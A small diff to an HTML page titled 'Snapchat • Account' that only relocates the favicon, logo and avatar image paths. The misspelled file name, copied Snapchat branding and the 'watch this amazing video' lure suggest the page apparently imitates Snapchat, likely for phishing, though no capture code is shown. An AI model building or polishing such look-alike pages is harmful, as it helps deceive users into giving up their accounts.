--- a/Acconts.html
+++ b/Acconts.html
@@ -7,7 +7,7 @@
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0 user-scalable=no">
 
-  <link rel="shortcut icon" href="/faviconV2.png">
+  <link rel="shortcut icon" href="img/faviconV2.png">
   <meta name="description" content="Watch this amazing video on Snapchat Spotlight!">
 
   <title>Snapchat • Account</title>
@@ -221,13 +221,13 @@
 
   <!-- Snapchat Logo -->
   <div class="logo">
-    <img src="/icon.svg" alt="Snapchat Logo">
+    <img src="img/icon.svg" alt="Snapchat Logo">
   </div>
 
   <div class="container">
     <div class="avatar-container">
       <div class="avatar">
-        <img src="/31151407-102973017962_11-s5-v1.webp" alt="User Avatar">
+        <img src="img/avatar.webp" alt="User Avatar">
       </div>
     </div>
 
